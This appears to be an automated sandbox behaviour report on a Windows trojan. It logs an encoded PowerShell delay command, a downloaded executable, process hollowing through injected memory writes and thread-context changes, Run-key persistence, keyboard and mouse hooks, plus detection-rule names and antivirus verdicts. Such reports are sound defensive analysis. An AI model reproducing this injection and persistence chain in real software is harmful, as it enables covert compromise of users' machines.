stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04571000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044e9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044ea000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044eb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0039c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044ec000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2548
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x044ed000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

 total_number_of_free_bytes: 0
free_bytes_available: 13318037504
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\
total_number_of_bytes: 0
1 1 0
file C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
cmdline Powershell -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath: Powershell
1 1 0

ShellExecuteExW

 show_type: 0
filepath_r: Powershell
parameters: -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath: Powershell
1 1 0
Time & API Arguments Status Return Repeated

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
flags: 3
oldfilepath_r: C:\Users\test22\AppData\Local\Temp\\Rckjlz.exe
newfilepath: C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
oldfilepath: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Date: Sun, 23 Oct 2022 02:53:08 GMT Server: Apache/2.4.29 (Ubuntu) Last-Modified: Thu, 22 Sep 2022 05:54:20 GMT ETag: "4ac400-5e93db1463b00" Accept-Ranges: bytes Content-Length: 4899840 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@BäïGHüâG¸ ( *.+{*+÷B++ }*+õ+ô( *Ö+ ÀG%Ð+ ++*( +â( +ío +è(+ã0¥,_+x8
received: 1024
socket: 720
1 1024 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@BäïGHüâG¸ ( *.+{*+÷B++ }*+õ+ô( *Ö+ ÀG%Ð+ ++*( +â( +ío +è(+ã0¥,_+x8
request_handle: 0x00cc000c
1 1 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeShutdownPrivilege
1 1 0
url https://curl.haxx.se/docs/http-cookies.html
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Possibly employs anti-virtualization techniques rule vmdetect
description Bypass DEP rule disable_dep
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Communications smtp rule network_smtp_raw
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Run a KeyLogger rule KeyLogger
description File Downloader rule Network_Downloader
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 604
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2248
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002e4
1 0 0

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtAllocateVirtualMemory

 process_identifier: 2920
region_size: 3989504
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000374
1 0 0
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Qusfukpzsf reg_value "C:\Users\test22\AppData\Roaming\Vvxyeheuij\Qusfukpzsf.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Fsaxd reg_value "C:\Users\test22\AppData\Roaming\Fdqudm\Fsaxd.exe"
reg_key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\svcsvc reg_value C:\Users\test22\AppData\Local\svcsvc\svcsvc.exe
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x0050f84a
hook_identifier: 14 (WH_MOUSE_LL)
module_address: 0x00000000
1 721329 0
Process injection Process 2248 manipulating memory of non-child process 2248
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225496 0

NtProtectVirtualMemory

 process_identifier: 2248
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8
protection: 72319744 (PAGE_GUARD|PAGE_NOCACHE)
base_address: 0x00000000
process_handle: 0x0000025c
3221225541 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x0043b000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: ðG 0
base_address: 0x008b0000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 2920
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x007a8000
process_identifier: 2920
process_handle: 0x00000374
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2920
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: MZÿÿ¸@8º´ Í!¸LÍ!This program cannot be run in DOS mode. $ÞVcۚ7 ˆš7 ˆš7 ˆ.«üˆ„7 ˆ.«þˆ]7 ˆ.«ÿˆ¾7 ˆ—ʈœ7 ˆ¡i‰†7 ˆ E ‰ý6 ˆ i‰7 ˆ i ‰Æ7 ˆGÈ݈ž7 ˆGÈ܈›7 ˆGÈƈ™7 ˆš7 ˆß5 ˆn‰˜7 ˆGÈȟ7 ˆ¡i ‰°7 ˆ¡i‰7 ˆ i‰7 ˆ i‰›7 ˆRichš7 ˆPELòÓÛ`à ì-<ˆ¤(.@à<€D¤8(:¼I¬’4Р2@.Ô̆8€.textê-ì- `.rdata¶º .¼ ð-@@.dataœÀ8"¬8@À.gfidsø`:Î9@@.tls €:à9@À.reloc¼I:Jâ9@B
base_address: 0x00400000
process_identifier: 2920
process_handle: 0x00000374
1 1 0
Time & API Arguments Status Return Repeated

SetWindowsHookExW

 thread_identifier: 0
callback_function: 0x004ca8cc
hook_identifier: 13 (WH_KEYBOARD_LL)
module_address: 0x00000000
1 459193 0
Process injection Process 2548 called NtSetContextThread to modify thread in remote process 604
Process injection Process 604 called NtSetContextThread to modify thread in remote process 2248
Process injection Process 2248 called NtSetContextThread to modify thread in remote process 2920
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 604
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2096400
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002f8
process_identifier: 2248
1 0 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 6857864
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000001c8
process_identifier: 2920
1 0 0
Process injection Process 2548 resumed a thread in remote process 604
Process injection Process 604 resumed a thread in remote process 2248
Process injection Process 2248 resumed a thread in remote process 2920
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2920
1 0 0
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
Bkav W32.AIDetectNet.01
Cyren W32/MSIL_Kryptik.IAJ.gen!Eldorado
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
Kaspersky UDS:Trojan.MSIL.Scarsi.gen
McAfee-GW-Edition BehavesLike.Win32.Trojan.cm
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.54e5e90fbafdf6f0
Google Detected
Kingsoft Win32.Troj.Undef.(kcloud)
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Cynet Malicious (score: 100)
McAfee Artemis!54E5E90FBAFD
VBA32 Downloader.MSIL.gen.rexp
SentinelOne Static AI - Suspicious PE
MaxSecure Trojan.Malware.300983.susgen
BitDefenderTheta Gen:NN.ZemsilF.34726.mm0@aK@FFgk
AVG CrypterX-gen [Trj]
Avast CrypterX-gen [Trj]
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x0000018c
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000338
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtGetContextThread

 thread_handle: 0x000000e4
1 0 0

NtSetContextThread

 registers.eip: 1921133444
registers.esp: 4912108
registers.edi: 38226840
registers.eax: 8159216
registers.ebp: 4912140
registers.edx: 1019902
registers.ebx: 98635776
registers.esi: 57279232
registers.ecx: 672827
thread_handle: 0x000000e4
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x000000e4
suspend_count: 1
process_identifier: 2548
1 0 0

NtResumeThread

 thread_handle: 0x00000228
suspend_count: 1
process_identifier: 2548
1 0 0

CreateProcessInternalW

 thread_identifier: 2712
thread_handle: 0x000004b0
process_identifier: 2708
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
track: 1
command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAANQAwAA==
filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x000004b8
1 1 0

CreateProcessInternalW

 thread_identifier: 812
thread_handle: 0x00000200
process_identifier: 604
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000224
1 1 0

NtGetContextThread

 thread_handle: 0x00000200
1 0 0

NtAllocateVirtualMemory

 process_identifier: 604
region_size: 258048
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000224
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $Z/.Nf}Nf}Nf}ªÒ—}Nf}ªÒ•}†Nf}ªÒ”}Nf}%e| Nf}%c|"Nf}%b|<Nf}ûc|Nf}ñ­}Nf}Ng}mNf}‰o|Nf}‰d|Nf}RichNf}PEL$î0_à VPž®p@ð@€,hxÀ\&€98:¸9@p˜.text{UV `.rdata„pZ@@.dataÈ€\@À.gfidsˆ l@@.tls °p@À.reloc\&À(r@B
base_address: 0x00400000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00401000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00427000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00438000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: Ìa±aV;fUfV£fV•ëVFL‡¦zšfBÅ1Å>IæHVV¥¤ø£]f)f@‡úböÄM—G—G\‹h7@8ǜ â}lÑ» Xì ªÍ€gÖá4>„?_^dŸ±oqoÐoÖJJêðïôðïðï ðï#$"JJ'o6o<#$"A@D#$"HGKoR^„ƒ‚€~}|{zyhg†•”“’‘~{ŽŒ‹œ¨ãÅÄÃÂÁðïÇcž°³îüû íäìäøää éêö9<8;ÊËÌÍÎÏÐÑÒÓÔ†…Ù†…  b Er4N]Z[ Y
base_address: 0x0043a000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: €
base_address: 0x0043b000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x0043c000
process_identifier: 604
process_handle: 0x00000224
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 604
process_handle: 0x00000224
1 1 0

NtSetContextThread

 registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4239006
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000200
process_identifier: 604
1 0 0

NtResumeThread

 thread_handle: 0x00000200
suspend_count: 1
process_identifier: 604
1 0 0

NtResumeThread

 thread_handle: 0x00000294
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x000002e8
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x00000444
suspend_count: 1
process_identifier: 2708
1 0 0

NtResumeThread

 thread_handle: 0x0000048c
suspend_count: 1
process_identifier: 2708
1 0 0

CreateProcessInternalW

 thread_identifier: 2252
thread_handle: 0x000002f8
process_identifier: 2248
current_directory:
filepath: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
track: 1
command_line:
filepath_r: C:\Users\test22\AppData\Local\Temp\Rckjlz.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x000002e4
1 1 0

NtGetContextThread

 thread_handle: 0x000002f8
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2248
region_size: 4923392
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002e4
1 0 0

WriteProcessMemory

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELiþScà ÒGðþïG H@  K`…´ïGJHÞìK  H.textÐG ÒG `.rsrcÞìHîÔG@@.reloc KÂJ@B
base_address: 0x00400000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00402000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00880000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: ðG 0
base_address: 0x008b0000
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2248
process_handle: 0x000002e4
1 1 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2096400
registers.edi: 0
registers.eax: 8908798
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002f8
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000002f8
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000001cc
suspend_count: 1
process_identifier: 2248
1 0 0

NtResumeThread

 thread_handle: 0x000001c8
suspend_count: 1
process_identifier: 2248
1 0 0

NtGetContextThread

 thread_handle: 0x00000150
1 0 0

NtResumeThread

 thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2248
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtGetContextThread

 thread_handle: 0x000000e0
1 0 0

NtResumeThread

 thread_handle: 0x000000e0
suspend_count: 1
process_identifier: 2248
1 0 0